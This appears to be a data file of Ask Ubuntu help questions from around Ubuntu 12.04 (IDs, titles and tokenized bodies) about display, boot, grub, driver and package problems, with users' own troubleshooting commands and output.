186271	jupiter seems to break multimonitor setup	if jupiter is in the startup my multimonitor setup will fail . instead of two separate desktops the monitors will be mirrored , one over the other with the smaller notebook-desktop in the larger screen : after each new log-in i have to reset the display settings in the `` system settings ... '' dialogue to two not mirrored screens , the changes do n't seem to be saved . given the the entry from xsession-errors /usr/lib/jupiter/scripts/resolutions : line 42 : /var/jupiter/available_resolutions_lvds : permission denied i assumed that it 's coming from jupiter . infact , if jupiter is removed as startup application the desktop settings are fine . any idea how to solve that issue ?
186276	where are all the major log files located ?	so , if there is some problem with my computer , be it hardware or software , what are the major log files and where are they located ? also , is there a generic location where log files of the other packages might be located ?
186279	how to access mounted file systems as a guest user ?	in ubuntu 11.04 i could mount a file system in /media/foo and run chown guest : guest /media/foo/bar -r and have full access in the guest account . after the upgrade to 12.04 i changed my routine to reflect the new guest usernames ( chown guest [ id ] : guest [ id ] /media/foo/bar -r ) but i still ca n't access it as a guest user , as i do n't have access privileges to /media as guest : ls : can not open directory /media : permission denied ( very interestingly this does work if i su into the guest account as root ) . i understand this is meant as a security measure but i do n't see how it is done . ls -l / reports drwxr-xr-x 11 root root 4096 sep 9 22:28 media thus my two questions : how does this restriction work and how can i access a mounted file system as a guest user , ideally without allowing access to all of the other mounted file systems ?
186287	automatically enable secondary display when connected	at my desk , i generally have a laptop plugged into an external monitor ( cloned display ) with the lid of the laptop closed . right now each time plug in the secondary display , i have to open the display properties , enable the display , select that it should be a clone , apply then confirm it worked . any way to automate that ? ( i 'm currently on 10.10 - so perhaps that workflow has improved in current releases . )
186288	how to detect and configure an output with xrandr ?	i have a dell u2410 monitor connected to a compaq 100b desktop equipped with an integrated amd/ati graphics card ( amd e-350 ) . the installed o/s is ubuntu 10.04 lts . the computer is connected to the monitor via the dvi connection . the problem is that i can not set the desktop resolution to the native 1920x1200 . the maximum allowed resolution is 1600x1200 . doing some research i found about the xrandr utility . unfortunately , when trying to use it i can not configure it to the required resolution . first , it does not report the output name ( which supposed to be dvi-0 ) , saying default instead . without it i can not use the -- fb option . the edid utility seems to identify the monitor well . here 's the output from get-edid : # edid version 1 revision 3 section `` monitor '' # block type : 2:0 3 : ff # block type : 2:0 3 : fc identifier `` dell u2410 '' vendorname `` del '' modelname `` dell u2410 '' # block type : 2:0 3 : ff # block type : 2:0 3 : fc # block type : 2:0 3 : fd horizsync 30-81 vertrefresh 56-76 # max dot clock ( video bandwidth ) 170 mhz # dpms capabilities : active off : yes suspend : yes standby : yes mode `` 1920x1200 '' # vfreq 59.950hz , hfreq 74.038khz dotclock 154.000000 htimings 1920 1968 2000 2080 vtimings 1200 1203 1209 1235 flags `` -hsync '' `` +vsync '' endmode # block type : 2:0 3 : ff # block type : 2:0 3 : fc # block type : 2:0 3 : fd endsection but the xrandr -q command returns : screen 0 : minimum 640 x 400 , current 1600 x 1200 , maximum 1600 x 1200 default connected 1600x1200+0+0 0mm x 0mm 1600x1200 0.0* 1280x1024 0.0 1152x864 0.0 1024x768 0.0 800x600 0.0 640x480 0.0 720x400 0.0 when i try to set the resolution , i get : $ xrandr -- fb 1920x1200 xrandr : screen can not be larger than 1600x1200 ( desired size 1920x1200 ) $ xrandr -- output dvi-0 -- auto warning : output dvi-0 not found ; ignoring how can i set the screen resolution to 1920x1200 ? why does n't xrandr identify the dvi-0 output ? note that the same computer running ubuntu version higher than 10.04 detects the correct resolution with no problems . on this machine i can not upgrade due to some legacy hardware compatibility problems . also , i do n't see any optional screen drivers available in the hardware drivers dialog . -- -- update : following the answer to this question , i got some advance . now the required mode is listed in the xrandr -q list , but i ca n't switch to that mode . using the monitors applet ( which now shows the new mode ) , i get the response that : the selected configuration for displays could not be applied . could not set the configuration to crtc 262 . from the command line it looks like this : $ cvt 1920 1200 60 # 1920x1200 59.88 hz ( cvt 2.30ma ) hsync : 74.56 khz ; pclk : 193.25 mhz modeline `` 1920x1200_60.00 '' 193.25 1920 2056 2256 2592 1200 1203 1209 1245 -hsync +vsync $ xrandr -- newmode `` 1920x1200_60.00 '' 193.25 1920 2056 2256 2592 1200 1203 1209 1245 -hsync +vsync $ xrandr -q screen 0 : minimum 640 x 400 , current 1600 x 1200 , maximum 1600 x 1200 default connected 1600x1200+0+0 0mm x 0mm 1600x1200 0.0* 1280x1024 0.0 1152x864 0.0 1024x768 0.0 800x600 0.0 640x480 0.0 720x400 0.0 1920x1200_60.00 ( 0x120 ) 193.0mhz h : width 1920 start 2056 end 2256 total 2592 skew 0 clock 74.5khz v : height 1200 start 1203 end 1209 total 1245 clock 59.8hz $ xrandr -- addmode default 1920x1200_60.00 $ xrandr -q screen 0 : minimum 640 x 400 , current 1600 x 1200 , maximum 1600 x 1200 default connected 1600x1200+0+0 0mm x 0mm 1600x1200 0.0* 1280x1024 0.0 1152x864 0.0 1024x768 0.0 800x600 0.0 640x480 0.0 720x400 0.0 1920x1200_60.00 59.8 $ xrandr -- output default -- mode 1920x1200_60.00 xrandr : configure crtc 0 failed another piece of info ( if it helps anyone ) : $ sudo lshw -c video *-display unclaimed description : vga compatible controller product : ati technologies inc vendor : ati technologies inc physical id : 1 bus info : pci @ 0000:00:01.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi bus_master cap_list configuration : latency=0 resources : memory : c0000000-cfffffff ( prefetchable ) ioport : f000 ( size=256 ) memory : feb00000-feb3ffff -- -- update 2 : here 's the updated lshw listing : $ sudo lshw -numeric -c video *-display unclaimed description : vga compatible controller product : ati technologies inc [ 1002:9802 ] vendor : ati technologies inc [ 1002 ] physical id : 1 bus info : pci @ 0000:00:01.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi bus_master cap_list configuration : latency=0 resources : memory : c0000000-cfffffff ( prefetchable ) ioport : f000 ( size=256 ) memory : feb00000-feb3ffff
186289	problem resuming after suspend	so , the computer suspends just fine . when i try to wake it up , the screen flickers a bit , and then there 's a black screen with all kinds of awful colored lines all over it . the mouse works normally , but it seems to be the only thing that functions . the only way to fix it seems to be doing a hard power off . my graphics card is nvidia , but that 's all i really know about it . my computer is a hp pavillion dv9000 .
186290	auto-remove of files from u1 account as soon removed from u1 folder	i have some personal photos and i does n't like to disclose it to anyone . but i need a copy of each of them in u1 . so , i put all of them in the u1 folder and they were uploaded to my u1 account . then i removed all of them from the folder . because , someone may see them when they open the u1 folder . i believed that copies of these photos reside in the u1 account . so , i logged in to u1 website via browser to view them . but i could n't see any of them there ( account was synced with my folder ! ) . but i have a backup copy of these . so , i did n't lose them . now , i need a copy in u1 account of these photos . but it should not be removed from the u1 account as soon as i removed from the u1 folder . so , can you help me to solve the problem ?
186291	assigning middle button to left scroll , logitech m505	i have a logitech m505 mouse , which works fine with my ubuntu 12.04 . however , the middle button is so hard to press down that in windows i had assigned it to left scroll with the logitech driver . so if i was to open a link in a new tab , i 'd pull the scroll button to the left . ( i should also note that the mouse i have has a middle button that scrolls up and down , can be pressed down , and also can be `` pulled '' to left and right ) . can i do this with xbindkeys , for instance ? i think i know all the info that i need about the mouse : numbers of buttons , device name , etc . i 'd appreciate if you could help .
186294	initial download ( pre installation ) happening at dial-up speed . only 2+ hours to go !	i am new to ubuntu and attempting to download it to my desktop ( wired ) pc so i can create a cd so i can install it on my laptop pc ( which is basically nonfunctional ) . although i have a fast internet connection , this download is moving at 72kbps or so . i 've tried turning off the firewall , resetting the modem and router , rebooting the computer , and nothing works . what else should i try , or is this really going to take nearly 3 hours ? thanks in advance .
186296	what are the f6 options during installation ?	what is the meaning of different options in the f6 context menu of ubuntu installation dvd ? i.e . acpi=off noapic nolapic edd=on nodmraid nomodeset free software only how do they affect the installation ?
186299	eclipse juno , need root access everytime i change the configuration	i am trying to install eclipse juno on 12.04 . i did all the things instructed in this link . but whenever i install any new software ( say cdt or pydev ) on eclipse , the new softwares are gone upon opening the eclipse app again . i then have to open eclipse again with root privileges to install all the software . i also ran into many problems with linking the include library for eclipse cdt . can anyone help me with installing juno in a way that i do not need root access every time i change configurations in eclipse ?
186300	running windows 7 64bit on raid 0	can i install ubuntu 12.04 alternate from the cd ( full complete install ) without tearing down my present raid configuration ?
186304	fedora disappears from grub.cfg at reboot	there have been many questions asked about the way that ubuntu 12.x grub plays poorly with fedora ( 17 in this case ) , but i could n't find a solution . ubuntu 's is my first partition , and its grub is on my mbr . fedora has its own grub on its own partition , which is how it has worked well for a very long time . occasionally , it would disappear from grub , but i would be able to retrieve it by mounting the partition and running update-grub . when i do that now , it says that it adds fedora to grub.cfg , but is not on the grub menu when i restart . i do n't know what to do ! it is worth noting that i have recently added linux mint 13 kde as a third distro a couple weeks ago , but this issue with fedora has just started in the last couple of days . even though fedora is clearly written to grub.cfg every time i reboot , i only see the other options ( mint , ubuntu , memory test , and a couple of older kernels for each ubuntu and mint ) . does anyone know what might be causing this ? thank you very much .
186307	website shows java not installed	when i try to use screenleap it asks me to install java . however , i have openjdk and icedtea already installed . how can i make it work ?
186308	i do n't have the password to update ubuntu	i have bought a laptop with ubuntu 12.04 , which runs fine but wants to update . i do n't have the password and it wo n't let me update anything . i have downloaded 12.04 in order to re-install it and it tells me it is n't suitable for my processor . the machine is a dell latitude d505 . i tried downloading the i386 version and on booting with the disc , i get : this kernel requires features not present on cpu . pae . unable to boot . all i 'm trying to do is to let software updater do it 's stuff but as it asks for a password , i ca n't proceed . i 've tried changing password in root shell but that does n't work . any ideas ? nothing seems to be working with this problem , so maybe i 'll just wait for the next official release and try again .
186312	how to remove permanently those error prompts while using openbox gnome ?	how to remove permanently those error prompts while using openbox gnome ? such as : update ubuntu latest release , this kind of errors etc , how to permanently disable them so that it does not show in front of my presentation . follow up : a ) how do i kill that screen shot error box ? $ cat /etc/default/whoopsie [ general ] report_crashes=false $ apport-cli *** send problem report to the developers ? after the problem report has been sent , please fill out the form in the automatically opened web browser . what would you like to do ? your options are : s : send report ( 69.7 kb ) v : view report k : keep report file for sending later or copying to somewhere else i : cancel and ignore future crashes of this program version c : cancel please choose ( s/v/k/i/c ) : i b ) how do i kill that update notification dialog box ? $ /etc/xdg/autostart # vim update-notifier.desktop # nodisplay=true nodisplay=false : wq $ cat update-notifier.desktop | grep nodisplay nodisplay=false no more disturbing popup 's now . final follow up : root @ sun-inspiron-one-2320 : ~ # apt-get -f remove apport update-manager update-manager-core reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : apport-gtk : depends : apport ( > = 0.41 ) but it is not going to be installed opera : i386 : depends : libc6 : i386 ( > = 2.3.2 ) but it is not going to be installed depends : libc6 : i386 ( > = 2.3.6-6~ ) but it is not going to be installed depends : libfontconfig1 : i386 but it is not going to be installed depends : libfreetype6 : i386 ( > = 2.2.1 ) but it is not going to be installed depends : libgcc1 : i386 ( > = 1:4.1.1 ) but it is not going to be installed depends : libglib2.0-0 : i386 ( > = 2.16.0 ) but it is not going to be installed depends : libgstreamer-plugins-base0.10-0 : i386 ( > = 0.10.16 ) but it is not going to be installed depends : libgstreamer0.10-0 : i386 ( > = 0.10.15 ) but it is not going to be installed depends : libice6 : i386 but it is not going to be installed depends : libsm6 : i386 but it is not going to be installed depends : libstdc++6 : i386 ( > = 4.1.1 ) but it is not going to be installed depends : libx11-6 : i386 but it is not going to be installed depends : libxext6 : i386 but it is not going to be installed depends : libxml2 : i386 ( > = 2.6.27 ) but it is not going to be installed depends : libxrender1 : i386 but it is not going to be installed depends : libxt6 : i386 but it is not going to be installed depends : zlib1g : i386 ( > = 1:1.1.4 ) but it is not going to be installed depends : gstreamer0.10-plugins-good : i386 but it is not going to be installed depends : fonts-liberation : i386 but it is not installable or ttf-liberation : i386 but it is not installable or ttf-mscorefonts-installer : i386 but it is not installable recommends : flashplugin-nonfree : i386 recommends : cups-client : i386 but it is not going to be installed update-notifier : depends : update-manager-gnome but it is not installable or update-manager but it is not going to be installed xdiagnose : depends : apport but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
186315	how to copy my home directory	i have an access problem with ice i cant boot as my user . so i thought that maybe i could save my home directory into w7 partition would be easiest i guess and upgrade from 11.10 to 12.04 can someone run me through copying my home directory over to w7 partition of suggest where to save it please . what should i write to copy it already as antony @ antony-305v4a-305v5a thanks
186322	move running program to background in bash	if i 'm running a program in bash , i can suspend it by pressing ctrl+z . if i want to leave the program running , i can then use the bg command . is there some way to directly put the program in the background , without having to type bg ? clarification : i want to put the program in the background when it is already running , without suspending it .
186329	how to automate the pass phrases when gpg signing dpkg-buildpackage ?	i 'm using dpkg-buildpackage and i would like to fully automate my scripts , but i can not find how to gpg sign the packages and automate entering the pass phrases in my continuous integration system . i do n't want to use the '-us -uc ' parameters , because i do want to sign them . any ideas ?
186332	bluetooth not working in12.04 ( dell inspiron 15r )	i am trying to get my bluetooth working on ubuntu 12.04 for my dell inspiron 15r laptop . i have tried installing blueman , but yet ubuntu is unable to access my bluetooth device . could anyone help me with installing the drivers and configuring the bluetooth .
186350	on boot , black screen says `` ubuntu 12.04.1 lts [ ubuntu name ] tty1 '' and asks for login	i am new to linux , never used it before . i can follow instructions but do n't know much about it . tried searching for a solution to this but could n't find one . i installed ubuntu 12.04 . it was working fine . now when i boot up , i get bios splash screen , brief purple screen , then a completely black screen that says : '' ubuntu 12.04.1 lts [ ubuntu name ] tty1 [ ubuntu name ] login : '' i can enter in my username and password , then it says : '' last login : mon sep 10 18:37:03 edt 2012 on tty1 welcome to ubuntu 12.04.1 lts ( gnu/linux 3.2.0-30-generic x86_64 ) *documentation : https : //help.ubuntu.com/ 0 packages can be updated 0 updates are security updates '' i had this issue , did a fresh install , and then continued having this same problem . at some point i was also just getting a black screen with a cursor . i think sometimes all it said was [ ok ] . please help - thanks !
186353	ubuntu installation stuck on on checking disk for defects	i am trying to install ubuntu 12.04 on my asus u36j , right after i choose `` install ubuntu '' the screen just went blank and with no response . my take is that it 's stuck on checking disk for defects . i tried several times the problem persists , so i chose an option that allows me to do advanced installing and i saw that the default first step is to check the disk for defects . so next time i choose check disk for defects when prompted and the same problem persists , that 's how i concluded that it 's stuck . i changed the factory hardrive to a ssd , i tried in my desktop which also uses ssd and it worked .
186358	files on desktop not updating	i noticed that when i would , for example , download a file to my desktop , it would not be reflected visually . that is , i did not see any icon for the file . curious , i checked in terminal ( ls ) and the file was there . i had managed to solve this by killing nautilus ( killall nautilus ) then restarting it ( nautilus & ) . so i 'm wondering : why did nautilus no longer update ? is this a known bug ? is there a config file i need to tweak ?
186361	dvd wont mount ubuntu 12.04	i ca n't seem to be able to mount my optical drive . i have tried numerous solutions from this site with no results . i am not able to see the device inside the file browser either . there is a dvd in the drive . i am running 12.04 on an hp g60-235dx portable . i have a link below to the specs . i will also list what i have tried ( that i can find back right now . ) i know the drive is functioning , because just before windows 7 crashed and my mbr went fubar i was watching movies just fine . i am fairly new to linux , so do n't assume i know anything . ok , so here is what i have tried : sudo wget -- output-document=/etc/apt/sources.list.d/medibuntu.list http : //www.medibuntu.org/sources.list.d/ $ ( lsb_release -cs ) .list sudo apt-get -- quiet update sudo apt-get -- yes -- quiet -- allow-unauthenticated install medibuntu-keyring sudo apt-get -- quiet update sudo apt-get install libdvdcss2 dmesg | grep sr0 ( no output ) apt-get install libdvdnav4 ( already installed , and up to date ) sudo /usr/share/doc/libdvdread4/install-css.sh ls -l /dev/cdrom /dev/cdrw /dev/dvd /dev/dvdrw /dev/scd0 /dev/sr0 ls : can not access /dev/scd0 : no such file or directory lrwxrwxrwx 1 root root 3 sep 10 03:51 /dev/cdrom - > sr0 lrwxrwxrwx 1 root root 3 sep 10 03:51 /dev/cdrw - > sr0 lrwxrwxrwx 1 root root 3 sep 10 03:51 /dev/dvd - > sr0 lrwxrwxrwx 1 root root 3 sep 10 03:51 /dev/dvdrw - > sr0 brw-rw -- -- + 1 root cdrom 11 , 0 sep 10 03:51 /dev/sr0 wodim -- devices wodim : overview of accessible drives ( 1 found ) : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 0 dev='/dev/sg1 ' rwrw -- : 'tsstcorp ' 'cddvdw ts-l633m' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - sudo lshw optical *-cdrom description : dvd-ram writer product : cddvdw ts-l633m vendor : tsstcorp physical id : 1 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : 0200 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc sudo lshw | grep cdrom *-cdrom logical name : /dev/cdrom spec sheet for portable : http : //www.cnet.com/laptops/hp-g60-235dx/4507-3121_7-33496192.html if you need any more information than all of that ... please let me know . updates running sudo apt-get install -- reinstall udisks , logging out , and logging back in resulted in an error message saying 'internal error . ' running udisks -- mount /dev/sr0 with a disc in the drive returned : 'mount failed : error mounting : mount : no medium found on /dev/sr0' running wodim -- prcap dev=/dev/sr0 with no disk in the drive returns : wodim : operation not permitted . warning : can not raise rlimit_memlock limits . device type : removable cd-rom version : 5 response format : 2 capabilities : vendor_info : 'tsstcorp' identification : 'cddvdw ts-l633m ' revision : '0200' device seems to be : generic mmc2 dvd-r/dvd-rw . drive capabilities , per mmc-3 page 2a : does read cd-r media does write cd-r media does read cd-rw media does write cd-rw media does read dvd-rom media does read dvd-r media does write dvd-r media does read dvd-ram media does write dvd-ram media does support test writing does read mode 2 form 1 blocks does read mode 2 form 2 blocks does read digital audio blocks does restart non-streamed digital audio reads accurately does support buffer-underrun-free recording does read multi-session cds does read fixed-packet cd media using method 2 does not read cd bar code does read r-w subcode information does not return r-w subcode de-interleaved and error-corrected does read raw p-w subcode data from lead in does return cd media catalog number does return cd isrc information does support c2 error pointers does not deliver composite a/v data does play audio cds number of volume control levels : 256 does support individual volume control setting for each channel does support independent mute setting for each channel does not support digital output on port 1 does not support digital output on port 2 loading mechanism type : tray does support ejection of cd via start/stop command does not lock media on power up via prevent jumper does allow media to be locked in the drive via prevent/allow command is not currently in a media-locked state does not support changing side of disk does not have load-empty-slot-in-changer feature does not support individual disk present feature maximum read speed : 4234 kb/s ( cd 24x , dvd 3x ) current read speed : 1412 kb/s ( cd 8x , dvd 1x ) maximum write speed : 4234 kb/s ( cd 24x , dvd 3x ) current write speed : 0 kb/s ( cd 0x , dvd 0x ) rotational control selected : clv/pcav buffer size in kb : 2048 copy management revision supported : 1 number of supported write speeds : 0 supported cd-rw media types according to mmc-4 feature 0x37 : does write multi speed cd-rw media does write high speed cd-rw media does write ultra high speed cd-rw media does write ultra high speed+ cd-rw media running sudo lshw -c disk with a disc in the drive returns : *-disk description : ata disk product : fujitsu mhz2320b vendor : fujitsu physical id : 0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 8909 serial : k618t913e9le size : 298gib ( 320gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=dfb6d394 *-cdrom description : dvd-ram writer product : cddvdw ts-l633m vendor : tsstcorp physical id : 1 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : 0200 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=busy *-disk description : scsi disk physical id : 0.0.0 bus info : scsi @ 6:0.0.0 logical name : /dev/sdb
186367	compiling icedtea : jdk home directory could not be found	google chrome keeps telling me that i need to update icedtea , i tried installing them from terminal , did n't work so i 'm installing icedtea and icedtea-web from source , when i do ./configure it tells me that fastjar is n't installed so i installed it , then it tells me that gawk is n't installed and i installed it and now it says : checking for a jdk home directory ... configure : error : `` a jdk jdk home directory could not be found . i have openjdk7 installed , how to fix it ? @ ben hague thank you , your answer fixes the first error , but now i see checking for javah ... no checking for gjavah ... no configure : error : `` a java header generator was not found . '' should n't javah be bundled with jdk ?
186371	how to submit a file to paste.ubuntu.com without graphical interface ?	my gui does not work . i can only see a text terminal . i would like to send my logs to paste.ubuntu.com but i do n't know how . without a graphical interface , i am lost . is there any way to submit a file to pastebin without needing any gui ?
186374	looking for a webcam	i am looking for a decent webcam with built in mic and roughly no more than $ 30 . i searched through amazon , then asked someone on # # linux . they suggested logitech . i checked logitech website and everything i looked at said windows only . although some people said they still work . i am looking for suggestions that will work . thanks !
186375	creating kernel module without sudo	how do i create a kernel module without the use of sudo ? i know the normal way ( sudo insmod , sudo rmmod ) , but we 're not allowed to use sudo in school .
186379	difference between 12.04 and 12.04.1 and boot problems	i recently did a fresh install of ubuntu 12.04 two days ago . or at least i thought it was 12.04 , but actually 12.04.1 . now i 'm having errors popping up from the grub loader . error : no video mode activated which was apparently resolved in this bug # 699802 . however these workarounds are for 11.xx and not working for me . i never had these errors before with 12.04 and now i 'm getting them . what 's the difference between 12.04 and 12.04.1 ? off the bat i notice that the kernels are different 12.04 uses 3.2.0-26-generic-pae 12.04.1 uses 3.2.0-29-generic after an immediate sudo apt-get update upgrade 12.04.1 uses 3.2.0-30-generic i have two other computers running 12.04 ( not 12.04.1 ) and they 're working fine . the computer that i 'm currently was working fine ( with 12.04 ) previously too . should i roll back my kernel to 3.2.0-26 ?
186384	how to switch from chrome beta to chrome stable on ubuntu ?	i 'm currently having an issue with chrome beta ( i.e. , this problem ) . how can i switch to google chrome stable ?
186387	laptop slows down while charging battery	laptop model : dell lattitude 5440 os : ubuntu 12.04 . while charging my laptop battery i 've noticed the following : mouse pointer moves very slowly . computer also slows a bit . this problem was not observed on windows 7 . thanks
186391	ubuntu installation on windows , i ca n't find my way back .	so recently i have installed ubuntu as an os in addition to my windows because it looked good and i have used it in the past and i liked it . before i installed ubuntu , they ( the website ) have given me a help list that shows that i will have the option of having windows aside to ubuntu ( dual install ) , while i work with the ubuntu os . they told me that if i either put it in a cd or usb drive , i 'll be okay . so there i was , installing ubuntu , saving the ubuntu file on my usb drive first , then afterwards clicking it and therefore proceeded to install . the problem is once i installed ubuntu , it directed me to the 'login ' page without giving me an option for dual-installing ( you know , the language portion and so on ) . now i tried both to suspend and shut off , and it seems like i can not access my windows files/account anymore and it really is unfortunate . now i am freaking out , because this is a shared computer that my family uses ( it 's like a main computer in the house ) and everyone 's files are on this . it is extremely crucial for me to get these windows files back because if i do n't , my life will end tonight . please , if someone can help me , i will love you forever . please just help me , this is urgent . i 'm sure a lot of people have experienced this too , but i have found nothing on the website helpful for me as ubuntu is a very new thing for me . thanks everyone ! : )
186395	how to alt-tab switch between windows without popup ?	sometimes i 'd like to switch between windows using alt-tab or similar shortcut without the popup ( showing window thumbnails ) . is it possible in 12.04 ? thanks .
186398	how to remove context menu options not shown on application selection	whenever i right click a html , css , js or php file i get the following : as you can see i have several options that do not show in the `` recommended applications '' window . i wish to eliminate all options that do not appear in the recommended application windows . in this case , the following are the ones i want to eliminate : google docs libreoffice writer scite text editor notepad
186399	how to lock unlock pen drive in ubuntu 12.04 ?	my name is prakash . we face below problem in ubuntu . kindly help us to solve it . how to lock unlock pen drive in ubuntu 12.04 ? how to give right to users ?
186400	how to clean and add options to the open with list of apps	after installing several ppas ( wine , pol ) and opening several files with other apps ( like changing from totem to vlc ) i discovered that the open with option had 2 problems : many items on the list are duplicated ( as seen on the image for `` a wine program '' ) sometimes the app i want to use to open is not shown there ( for example , virtualbox or vlc ) so how can i edit this list to clean the duplicates and add missing apps from the list .
186404	going back to windows 7	so i have been using ubuntu for a few months now and just put it on my families desktop . problem is my brother has some files he needs to get from windows 7 and when i restart my computer it does n't give me the option to choose my os . i definitely said run alongside windows too . any help would be appreciated !
186407	upgraded from 10.04 to 12.04 and grub drops to busybox prompt without error	i updated a working server from 10.04 to 12.04.1 today . everything upgraded without error . however , there is an odd issue with grub and the new kernel ( 3.2.0-30-generic ) . after grub boots , the system says `` starting up ... '' and switches to a text-based full-screen progress bar ( with 4 dots ) for 20 seconds , then it drops to a busybox shell . no matter how long i wait , i can simply type `` exit '' and the boot process switches back to the text-based full-screen boot progress bar and ultimately boots successfully . no errors at all . my kernel in 10.04 ( 2.6.32.22 ) , which i still have , will boot without triggering the busybox prompt . i have already tried running update-initramfs and my lvm volume uuid 's match what 's in /etc/fstab . is there a log i could check to see why the new kernel thinks it needs to enter the busybox shell , since the initramfs shell does n't offer any clues and it boots fine after exiting the shell ?
186408	ubuntu software center is crashing	ubuntu software center is not running . also is not getting update and once i click show updates , it tells me the following : 'e : type 'ain ' is not known on line 1 in spurces list /etc/apt/sources.list.d/kiwixteam-ppa-precise.list'
186413	how to boot from ubuntu 12.04 ?	when i buy laptop recently , it already install win7 . i remove d to install ubuntu 12.04 64 bits . at first i only set partitions like this , and i do n't change any other partitions related with win7 : swap 16gb / 150gb but i got this message : the partition table format in use on your disks normally requires you to create a separate partition for boot loader code . this partition should be marked for use as a `` reserved bios boot area '' and should be at least 1mb in size . note that this is not the same as a partition mounted on /boot . so i try to add one partition : biosgrub 1mb and i can install ubuntu successfully . but when i boot , it shows : reboot and select proper boot device or insert boot media in selected boot device and press a key . if i change bios boot option to windows boot manager ( p0 : st9750420as ) , it can boot into win7 normally . boot option only have 3 options : windows boot manager ( p0 : st9750420as ) p2 : hl-dt-st dvdram gt51n disabled how to boot into ubuntu 12.04 which i just installed ? i also find similar post , but i ca n't figure out what to do next . how to solve it ? thank you~
186417	how do i try the ubuntu livecd inside windows ?	how can i try ubuntu in windows directly from iso without burning any disc or using usb drive ?
186419	how can i change the location of the ubuntu notifications ?	in ubuntu 12.04 , notifications appear at the left upper corner of the screen . some times it 's annoying me specially while working on virtual box . so , how to change the location of these notifications if i wan na for example make it appear on the left bottom corner .
186421	free pe size less than vg size ?	using ubuntu 12.04 , $ sudo vgdisplay -- -- -- -- -- -- volume group -- -- -- -- -- -- -- -- -- vg name vol sysytem id format lvm2 metadata areas 1 metadata sequence no 1 vg access read/write vg status resizable max lv 0 cur lv 0 open lv 0 max pv 0 cur pv 1 act pv 1 **vg size 111.86gib** pe size 4.00mib **total pe 28635** alloc pe / size 0/0 **free pe / size 28635/111.86gib** vg uuid s4lclr-fc51-ke6g-0c5l-d3sv-dipj-7hubht question : 4.00mib * 28635 = 114.54m < 111.86gib why ? expecting your answer ! thank you !
186422	problem by installing java	yesterday night i was trying to download java as per instructions given on http : //developer.android.com/ .but i messed up somewhere and had to give up the thing . but since morning when ever i try to install or remove some thing i get the following response http : //paste.ubuntu.com/1198084/ please help fast . i am a newbie in android development and have to submit an app within 5 days from now for a project . and i need my linux machine working fine for that .
186424	how to access ubuntu 12.04 from a multi-boot system ?	i had windows 7 installed on my machine , and then late i 've installed windows 8 ( dual boot ) , and they work fine together . windows 8 was normally loaded , but to load windows 7 i had to reboot the machine first from win8 boot menu . now , after installing ubuntu 12.04 , i can access windows 7 normally , but when i want to access windows 8 i ca n't , system reboot and i am again on grub loader . what can i do to fix this ?
186425	how do i uninstall the ubuntu studio desktop package ?	i have installed ubuntustudio-desktop for ubuntu 12.04.1 on my computer . then i noticed that there is no practical difference ( with the non studio version ) with the exception of xfce and new start screen , so i decided to delete it . could someone help me to uninstall it ?
186426	how do i control the fan on a apple mac mini ?	i am running 12.04 lts on apple mini hardware ( about 4 years old ) . the fan seems to run non-stop . `` thinkfan '' is installed but i do not know how to use it in order to modulate fan speed . the software says that it can be used with systems other than thinkpads through sysfs hwmon interface . i have no idea what that is .
186432	how do i focus on the status bar with keyboard in ubuntu 11.10 ?	connecting to internet is only the time when i really need to use my mouse . i give priority to my keyboard . i only use mouse when i 'm tired of using keyboard or in the condition i listed above . actually i ca n't focus on the status bar . what 's the keyboard shortcut to focus there ? ( by status bar , i mean the panel where time , network status etc . are shown . )
186437	are there any differences in graphics drivers from the `` x-swat '' vs. `` xorg-edgers '' ppas ?	are there any differences between nvidia-graphics-drivers 304.43 from x-swap ppa and x-edgers ppa , or is it the same package ?
186449	my 2nd screen going gray after kernel upgrade to 3.2.0-30 . ( 12.04 )	my video card is nvidia gt 9400 . same as title , i upgrade kernel from 3.2.029 to 3.2.0-30 yesterday . after upgrade , 2nd monitor turn to gray & could not configure . my xorg.conf is http : //paste.ubuntu.com/1198200/ and my xorg.0.log file . http : //paste.ubuntu.com/1198169/ please help me : )
186450	grub not loading after windows 8 install	my system was configured to dual boot ubuntu 12.04.1 lts and windows 7 . today i got my hands on the msdn release of windows 8 and i installed it over my windows 7 . now the computer just boots to windows 8 directly without loading the grub screen . so i followed the steps as suggested in : https : //help.ubuntu.com/community/recoveringubuntuafterinstallingwindows . running this command : ls -l /dev/disk/by-label/ gives the following output : total 0 lrwxrwxrwx 1 root root 10 sep 11 07:51 entertainment - > ../../sda2 lrwxrwxrwx 1 root root 10 sep 11 02:45 pendrive - > ../../sdb1 also fdisk -l command gives this as the output : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x1246aa23 device boot start end blocks id system /dev/sda1 * 2048 319582199 159790076 7 hpfs/ntfs/exfat /dev/sda2 319582208 602906623 141662208 7 hpfs/ntfs/exfat /dev/sda3 602908672 625135615 11113472 83 linux disk /dev/sdb : 1939 mb , 1939865600 bytes 64 heads , 63 sectors/track , 939 cylinders , total 3788800 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdb1 * 2248 3788799 1893276 c w95 fat32 ( lba ) so i assume that i have to run this : sudo grub-install /dev/sda3 